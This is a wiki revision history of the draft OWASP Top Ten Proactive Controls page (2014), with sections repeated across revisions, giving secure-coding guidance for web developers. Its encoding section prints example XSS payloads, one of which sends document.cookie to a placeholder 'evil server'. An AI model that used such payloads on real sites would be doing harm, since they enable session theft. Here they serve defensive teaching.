It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
For more information on how to properly implement logging in an application, please see the [[Logging Cheat Sheet]].<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use-cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, forgot password or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse-cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse scenarios will uncover weaknesses that need to be addressed to improve the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of what personal and confidential information needs to be protected and tracked in the application. This will drive the need for access control, encryption and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
There are different areas where you need to be concerned about security in the architecture and design of a system:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls are enforced at the client, the web layer, the business layer, the data layer, and where you need to establish trust between different systems or different parts of the same system. Understand trust boundaries: what is inside or outside of a trust boundary, what actors or data can be trusted, what should not be? This determines where you need to make decisions about authentication, access control, data validation and encoding, encryption and logging.<br />
<br />
3) '''Understand the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (whether you should do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
For more information, see the [[Attack Surface Analysis Cheat Sheet]].<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=169954OWASP Proactive Controls2014-03-11T20:18:26Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection or Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
For more information on how to properly implement logging in an application, please see the [[Logging Cheat Sheet]].<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use-cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features are often multi-step multi-branch workflows that are difficult to evaluate thoroughly, for example eCommerce workflows, shipping route choices, or banking transfer validation. The stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if someone cancels or repeats a step?) and requirements derived from "abuse-cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and attack scenarios will uncover weaknesses that need to be addressed to improve the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of what personal and confidential information needs to be protected and tracked in the application. This will drive the need for access control, encryption and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
There are different areas where you need to be concerned about security in the architecture and design of a system:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls are enforced at the client, the web layer, the business layer, the data layer, and where you need to establish trust between different systems or different parts of the same system. Understand trust boundaries: what is inside or outside of a trust boundary, what actors or data can be trusted, what should not be? This determines where you need to make decisions about authentication, access control, data validation and encoding, encryption and logging.<br />
<br />
3) '''Understand the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (whether you should do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
For more information, see the [[Attack Surface Analysis Cheat Sheet]].<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=169953OWASP Proactive Controls2014-03-11T20:08:51Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
